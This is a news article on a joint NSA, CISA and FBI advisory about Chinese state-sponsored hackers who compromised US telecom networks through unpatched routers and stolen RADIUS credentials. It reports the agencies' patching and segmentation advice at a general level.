Chinese hackers snooped on US telco traffic for years

China's flag overlays laptop screen
(Image credit: Shutterstock)

Chinese state-sponsored actors have been successfully compromising the networks of major US telecommunications providers for years, using the foothold gained to assault other targets in both public and private sectors. 

This stark warning was jointly issued by the National Security Agency (NSA), Cybersecurity & Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI).

According to the warning, multiple Chinese hacking groups were targeting known vulnerabilities in unpatched devices such as routers. Compromised endpoints would then be made part of a larger malicious infrastructure, leveraged to mount even more dangerous attacks. 

Share your thoughts on Cybersecurity and get a free copy of the Hacker's Manual 2022end of this survey

Share your thoughts on Cybersecurity and get a free copy of the Hacker's Manual 2022. Help us find how businesses are preparing for the post-Covid world and the implications of these activities on their cybersecurity plans. Enter your email at the end of this survey to get the bookazine, worth $10.99/£10.99.

"Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting," it was said in the warning.

The threat actor would then steal login data to access SQL databases, exfiltrating administrator credentials from critical Remote Authentication Dial-In User Service (RADIUS) servers.

"Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route, capture, and exfiltrate traffic out of the network to actor-controlled infrastructure," the announcement further states.

There is a pretty big list of CVEs the threat actors were using to attack telcos, which can be found on this link. Apparently, the Chinese have been at it since at least 2020.

The three government agencies have urged all affected parties - companies in both private and public sectors, in the US, as well as in allied countries, to keep vigilant - apply patches as soon as they’re made available, replace obsolete gear, disable unnecessary ports, and keep a strong stack of antivirus and firewall solutions.

Segmenting networks to prevent threat actors from moving laterally is also being recommended.

Via: BleepingComputer

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.